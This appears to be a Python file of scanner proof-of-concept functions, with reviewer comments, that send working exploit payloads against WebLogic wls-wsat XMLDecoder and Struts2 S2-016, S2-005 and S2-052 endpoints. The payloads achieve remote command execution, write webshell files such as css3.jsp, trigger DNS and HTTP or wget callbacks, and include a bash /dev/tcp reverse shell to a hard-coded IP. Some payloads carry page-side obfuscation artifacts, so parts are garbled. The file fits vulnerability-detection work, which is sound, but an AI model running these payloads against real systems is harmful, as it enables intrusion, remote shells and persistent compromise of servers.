def poc(url):
    """Probe a WebLogic host for the wls-wsat XMLDecoder deserialization issue.

    Normalises ``url`` (adds a scheme, drops fragment/query and the trailing
    slash), builds a SOAP envelope whose ``work:WorkContext`` header carries a
    ``java.lang.ProcessBuilder`` element, POSTs it to
    ``/wls-wsat/CoordinatorPortType`` and then looks for either an
    out-of-band DNS callback or a tell-tale ``<faultstring>`` in the reply.

    Returns a tagged string when the DNS callback is observed, ``True`` when
    the fault string matches, and ``False`` otherwise -- including on any
    request error, which is only logged at DEBUG level.

    Detection note: the request shape visible here (POST to
    ``/wls-wsat/CoordinatorPortType``, ``text/xml`` content type, a
    ``WorkContext`` header containing ``<java>``/``ProcessBuilder``) is the
    signature a WAF or IDS rule should key on.
    """
    url = url if '://' in url else 'http://' + url
    url = url.split('#')[0].split('?')[0].rstrip('/')

    # Out-of-band helper: getCommand("dns") yields a shell command string that,
    # if run on the target, causes a DNS lookup verifyDNS() can later observe.
    mydnslog = Dnslog("weblogic-wls-xml")
    cmd = mydnslog.getCommand("dns")
    # One <string> element per whitespace-separated token of the command.
    exec_cmd = '<array class="java.lang.String" length="{0}">'.format(
        len(cmd.split()))
    for i, c in enumerate(cmd.split()):
        exec_cmd += '<void index="{0}"><string>{1}</string></void>'.format(
            i, c)
    exec_cmd += '</array>'
    # NOTE(review): reverse_shell_cmd is built but never used below; the
    # hard-coded 192.168.1.137:2000 endpoint is a leftover from the author's lab.
    reverse_shell_cmd = '''
    <array class="java.lang.String" length="3">
        <void index="0">
        <string>/bin/bash</string>
        </void>
        <void index="1">
        <string>-c</string>
        </void>
        <void index="2">
        <string>bash -i &gt;&amp; /dev/tcp/192.168.1.137/2000 0&gt;&amp;1</string>
        </void>
    </array>
    '''
    # SOAP envelope; the {} placeholder receives the argv <array> built above.
    payload_data = '''
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
      <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
          <java>
            <void class="java.lang.ProcessBuilder">
                {}
              <void method="start"/>
            </void>
          </java>
        </work:WorkContext>
      </soapenv:Header>
      <soapenv:Body/>
    </soapenv:Envelope>
    '''
    vulurl = url + "/wls-wsat/CoordinatorPortType"
    try:
        headers = {'Content-Type': 'text/xml;charset=UTF-8'}
        data = payload_data.format(exec_cmd)  # original note: substitute reverse_shell_cmd here for a reverse shell (it says "reverse_shell_data", which does not exist)
        resp = requests.post(vulurl, data=data, headers=headers, timeout=10)
        # verifyDNS(3): presumably waits up to ~3 s for the callback -- confirm in Dnslog
        if mydnslog.verifyDNS(3):
            return "[weblogc-wls-xmldecoder][dnslog]" + url  # NOTE(review): "weblogc" typo in the tag; anything matching on it must use the misspelling
        # A fault naming ProcessBuilder shows the XMLDecoder processed the
        # element even when no callback arrived (e.g. outbound DNS blocked).
        if '<faultstring>java.lang.ProcessBuilder' in resp.text or "<faultstring>0" in resp.text:
            return True
    except Exception as e:
        # Broad catch keeps a batch scan running; the cause is only visible at DEBUG.
        logging.debug(e)
    return False
def poc(url):
    """Probe a Struts2 action for S2-016 via the ``redirect:`` OGNL prefix.

    Normalises ``url``, then sends each payload in ``payloads`` as the value
    of a ``?redirect:`` query parameter and checks, per request, for an
    echoed marker string, a short response containing ``webapps`` (real-path
    disclosure), a DNS callback, or an HTTP callback.

    Returns ``True`` on the echoed marker, a tagged string for the other
    three signals, and ``False`` when nothing matched; request errors are
    logged at DEBUG level and the loop continues.

    NOTE(review): the two trailing payloads attempt to write a file on the
    target (``FileOutputStream`` / ``FileWriter`` ... ``css3.jsp``) and their
    effect is never checked -- a detection-only scan should not send them.
    NOTE(review): ``urllib.quote`` is the Python 2 API (``urllib.parse.quote``
    on Python 3), and the ``[email protected]`` fragments in the payloads look
    like a page-side obfuscation artifact rather than the author's text, so
    this listing is not runnable as shown.
    """
    url = url if '://' in url else 'http://' + url
    url = url.split('#')[0].split('?')[0]

    # Marker echoed back by the first payload when expression evaluation works.
    command = "echo rivirsirfortest"
    mydnslog = Dnslog("s2016")
    dns_cmd = mydnslog.getCommand("dns")
    web_cmd = mydnslog.getCommand("web")
    payloads = [
        # command-execution payload (echoes the marker)
        '${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#[email protected]@getRuntime().exec("%s").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}'
        % command,
        # real-path disclosure payload
        "${#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),#a=#req.getSession(),#b=#a.getServletContext(),#c=#b.getRealPath('/'),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#c),#matt.getWriter().flush(),#matt.getWriter().close()}",
        # dns_cmd (same template as the first payload, DNS callback command)
        '${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#[email protected]@getRuntime().exec("%s").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}'
        % dns_cmd,
        # web_cmd (same template, HTTP callback command)
        '${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#[email protected]@getRuntime().exec("%s").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}'
        % web_cmd,
        # webshell-writing payloads -- sent unconditionally, result never checked
        '#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletRequest"),#b=new java.io.FileOutputStream(new java.lang.StringBuilder(#a.getRealPath("/")).append(@java.io.File@separator).append(#a.getParameter("name")).toString()),#b.write(#a.getParameter("t").getBytes()),#b.close(),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println("BINGO"),#genxor.flush(),#genxor.close()',
        '#req=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletRequest"),#p=(#req.getRealPath("/")+"css3.jsp").replaceAll("\\", "/"),new java.io.BufferedWriter(new java.io.FileWriter(#p)).append(#req.getParameter("c")).close()}'
    ]

    for payload in payloads:
        # Detection signature for defenders: a query string starting with
        # "redirect:" followed by URL-encoded OGNL ("${", "#_memberAccess", ...).
        vulurl = url + '?redirect:%s' % urllib.quote(payload)
        try:
            resp = requests.get(vulurl, timeout=10)
            if "rivirsirfortest" in resp.text:
                #print resp.text
                return True
            # Short body that mentions "webapps" is taken as a leaked real path.
            if len(resp.text) <= 100 and "webapps" in resp.text:
                return "[S2-016][web dir]%s" % resp.text + url
            # NOTE(review): the next two tags contain a literal "%s" that is
            # never formatted, so the returned string reads "...%s<url>".
            if mydnslog.verifyDNS(3):
                return "[S2-016][dnslog]%s" + url
            if mydnslog.verifyHTTP(3):
                return "[S2-016][weblog]%s" + url
        except Exception as e:
            # Per-payload failures are swallowed so the remaining payloads still run.
            logging.debug(e)
    return False
def poc(url):
    """Blind (no-echo) S2-005 probe; detection is not fully provided yet.

    Normalises ``url``, appends each pre-encoded query-string payload to it
    and issues a GET per payload, then relies purely on out-of-band signals
    (DNS or HTTP callback) since the target echoes nothing back.

    Returns ``"[s2-005] " + url`` when either callback is observed, ``False``
    otherwise. Unlike the sibling probes there is no ``try``/``except`` and
    no ``timeout`` on the requests, so a slow host stalls the whole scan and
    a connection error propagates to the caller.

    NOTE(review): ``page1`` and ``resp`` are assigned but never used, the
    first payload creates ``/tmp/success`` on the target without ever being
    checked, and ``print(dnslog_cmd)`` writes the callback command to stdout.
    The ``[email protected]`` fragments in the payloads look like a page-side
    obfuscation artifact, not the author's text.
    """
    url = url if '://' in url else 'http://' + url
    url = url.split('#')[0].split('?')[0]

    # Side-effect-only command; nothing below verifies whether it ran.
    command = "touch /tmp/success"
    mydnslog = Dnslog("s2005")
    dnslog_cmd = mydnslog.getCommand("dns")
    print(dnslog_cmd)
    web_curl_cmd = mydnslog.getCommand("web_curl")
    payloads = [
        # blind payload (no output echoed)
        "?(%27%5cu0023_memberAccess[%5c%27allowStaticMethodAccess%5c%27]%27)(vaaa)=true&(aaaa)((%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003d%5cu0023vccc%27)(%5cu0023vccc%5cu003dnew%20java.lang.Boolean(%22false%22)))&(asdf)(('%5cu0023rt.exec(%22{cmd}%22.split(%22@%22))')(%5cu0023rt%[email protected]@getRuntime()))=1"
        .format(cmd=command),
        # dnslog payload
        "?(%27%5cu0023_memberAccess[%5c%27allowStaticMethodAccess%5c%27]%27)(vaaa)=true&(aaaa)((%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003d%5cu0023vccc%27)(%5cu0023vccc%5cu003dnew%20java.lang.Boolean(%22false%22)))&(asdf)(('%5cu0023rt.exec(%22{cmd}%22.split(%22@%22))')(%5cu0023rt%[email protected]@getRuntime()))=1"
        .format(cmd=dnslog_cmd),
        # weblog (HTTP callback) payload
        "?(%27%5cu0023_memberAccess[%5c%27allowStaticMethodAccess%5c%27]%27)(vaaa)=true&(aaaa)((%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003d%5cu0023vccc%27)(%5cu0023vccc%5cu003dnew%20java.lang.Boolean(%22false%22)))&(asdf)(('%5cu0023rt.exec(%22{cmd}%22.split(%22@%22))')(%5cu0023rt%[email protected]@getRuntime()))=1"
        .format(cmd=web_curl_cmd)
    ]
    # Baseline fetch; its result is never consulted.
    page1 = requests.get(url)
    for payload in payloads:
        # Detection signature for defenders: query keys containing the
        # "%5cu0023" (escaped "#") OGNL form with "_memberAccess" / "denyMethodExecution".
        vulurl = url + payload
        resp = requests.get(vulurl)
        # verifyDNS/verifyHTTP(3): presumably a ~3 s wait for the callback -- confirm in Dnslog
        if mydnslog.verifyDNS(3):
            return "[s2-005] " + url
        if mydnslog.verifyHTTP(3):
            return "[s2-005] " + url
    return False
 def setUpClass(cls):
     """Build one shared ``Dnslog("weblogic")`` helper for the whole test class.

     Stores the helper itself, its callback domain and the DNS and web probe
     command strings as class attributes so every test method can reuse them
     without creating a new helper per test.
     """
     helper = Dnslog("weblogic")
     cls.dnslog = helper
     cls.domain = helper.getDomain()
     cls.dns_command = helper.getCommand("dns")
     cls.web_command = helper.getCommand("web")
def poc(url):
    """Probe a Struts2 REST endpoint for S2-052 (XStream deserialization).

    Normalises ``url``, builds an XStream ``<map>`` document that wraps a
    ``java.lang.ProcessBuilder`` running ``wget <weburl>`` inside a
    ``javax.imageio.spi.FilterIterator`` chain, POSTs it with
    ``Content-Type: application/xml`` and then waits for the HTTP callback.

    Returns ``"[S2-052][weblog] " + url`` when the callback is observed. No
    other return statement is visible in this listing, so as shown the
    function yields ``None`` otherwise -- NOTE(review): confirm whether a
    trailing ``return False`` follows, and that callers treat ``None`` as
    "not detected". The POST has no ``timeout`` and no ``try``/``except``,
    so a slow or unreachable host stalls the scan or raises to the caller.

    Detection note: an ``application/xml`` body containing
    ``jdk.nashorn.internal.objects.NativeString``, ``javax.imageio.spi.FilterIterator``
    and ``java.lang.ProcessBuilder`` is the request signature to alert on.
    """
    url = url if '://' in url else 'http://' + url
    url = url.split('#')[0].split('?')[0].rstrip('/')

    mydnslog = Dnslog("s2-052")
    # Callback URL the target is asked to fetch; verifyHTTP() checks for the hit.
    weburl = mydnslog.getWeburl()
    print("weblog url: %s" % weburl)
    # The {url} placeholder below is the only substitution in the document.
    payload = """<map>
  <entry>
    <jdk.nashorn.internal.objects.NativeString>
      <flags>0</flags>
      <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
        <dataHandler>
          <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
            <is class="javax.crypto.CipherInputStream">
              <cipher class="javax.crypto.NullCipher">
                <initialized>false</initialized>
                <opmode>0</opmode>
                <serviceIterator class="javax.imageio.spi.FilterIterator">
                  <iter class="javax.imageio.spi.FilterIterator">
                    <iter class="java.util.Collections$EmptyIterator"/>
                    <next class="java.lang.ProcessBuilder">
                      <command>
                        <string>wget</string>
                        <string>{url}</string>
                      </command>
                      <redirectErrorStream>false</redirectErrorStream>
                    </next>
                  </iter>
                  <filter class="javax.imageio.ImageIO$ContainsFilter">
                    <method>
                      <class>java.lang.ProcessBuilder</class>
                      <name>start</name>
                      <parameter-types/>
                    </method>
                    <name>foo</name>
                  </filter>
                  <next class="string">foo</next>
                </serviceIterator>
                <lock/>
              </cipher>
              <input class="java.lang.ProcessBuilder$NullInputStream"/>
              <ibuffer></ibuffer>
              <done>false</done>
              <ostart>0</ostart>
              <ofinish>0</ofinish>
              <closed>false</closed>
            </is>
            <consumed>false</consumed>
          </dataSource>
          <transferFlavors/>
        </dataHandler>
        <dataLen>0</dataLen>
      </value>
    </jdk.nashorn.internal.objects.NativeString>
    <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
  </entry>
  <entry>
    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
  </entry>
</map>""".format(url=weburl)

    # Browser-like User-Agent plus the XML content type the REST plugin parses.
    headers = {
        "User-Agent":
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36",
        "Content-Type": "application/xml"
    }
    resp = requests.post(url, data=payload, headers=headers)
    # verifyHTTP(3): presumably a ~3 s wait for the callback -- confirm in Dnslog
    if mydnslog.verifyHTTP(3):
        return "[S2-052][weblog] " + url